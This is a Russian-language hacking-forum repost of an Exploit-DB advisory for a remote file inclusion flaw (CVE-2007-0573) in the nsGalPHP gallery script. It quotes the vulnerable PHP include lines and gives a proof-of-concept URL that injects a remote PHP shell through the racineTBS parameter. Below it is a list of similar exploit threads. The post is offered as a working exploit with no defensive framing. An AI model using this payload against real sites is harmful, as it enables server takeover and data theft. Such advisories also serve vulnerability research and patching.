Exploit nsGalPHP - '/includes/config.inc.php?racineTBS' Remote File Inclusion

Exploiter

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
3205
Проверка EDB
  1. Пройдено
Автор
S.W.A.T.
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2007-0573
Дата публикации
2007-01-27
Код: 
                   _________________________________
          ________|                                 |________
          \       |              S.W.A.T.           |       /
           \      |                                 |      /
           /      |_________________________________|      \
          /___________)                         (___________\
    ------------------------------------------------------------------------------------------------------------------------
    Script:nsGalPHP
    Affected Version:unknown
    Downlaoad&Victim:http://www.easy-script.com/compt.php?id=3521
    ------------------------------------------------------------------------------------------------------------------------
    Author:S.W.A.T.
    ------------------------------------------------------------------------------------------------------------------------
    Bug in (includes/config.inc.php)
    Vul Code;
    include_once($racineTBS.'includes/tbs_class.php');
    include_once($racineTBS.'includes/fonctions.inc.php');
    require($racineTBS.'lang/'.$config['langueDefaut'].'.php');
    ------------------------------------------------------------------------------------------------------------------------
    POC:
    http://[target]/[path]/includes/config.inc.php?racineTBS=[PHPSHELL]
    ------------------------------------------------------------------------------------------------------------------------
    Thx:str0ke-koray-Timq-r0ut3r-nuffsaid-All My Friends
    Special Greetz:All Member Of XmorsTEAM
    ------------------------------------------------------------------------------------------------------------------------

# milw0rm.com [2007-01-27]
 
Источник
www.exploit-db.com
Войдите или зарегистрируйтесь для ответа.

Похожие темы

Exploiter
Exploit pragmaMx 1.12.1 - '/includes/wysiwyg/spaw/editor/plugins/imgpopup/img_popup.php?img_url' Cross-Site Scripting
Ответы
0
Просмотры
474
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit DragDropCart - '/includes/ajax/getstate.php?prefix' Cross-Site Scripting
Ответы
0
Просмотры
479
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit x10 MP3 Automatic Search Engine 1.6.5 - '/includes/video_ad.php?pic_id' Cross-Site Scripting
Ответы
0
Просмотры
423
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Chyrp 2.1.2 - '/includes/error.php?body' Cross-Site Scripting
Ответы
0
Просмотры
459
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Premod SubDog 2 - '/includes/logger_engine.php?phpbb_root_path' Remote File Inclusion
Ответы
0
Просмотры
444
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Premod SubDog 2 - '/includes/themen_portal_mitte.php?phpbb_root_path' Remote File Inclusion
Ответы
0
Просмотры
434
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Premod SubDog 2 - '/includes/functions_kb.php?phpbb_root_path' Remote File Inclusion
Ответы
0
Просмотры
440
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit WordPress Core 2.1.1 - '/wp-includes/theme.php?iz' Arbitrary Command Execution
Ответы
0
Просмотры
420
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Basic Analysis and Security Engine (BASE) 1.4.5 - '/includes/base_state_common.inc.php?GLOBALS[user_session_path]' Remote File Inclusion
Ответы
0
Просмотры
373
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Basic Analysis and Security Engine (BASE) 1.4.5 - '/includes/base_state_criteria.inc.php?base_path' Remote File Inclusion
Ответы
0
Просмотры
362
Эксплойты & Уязвимости
Exploiter
Exploiter
Сверху Снизу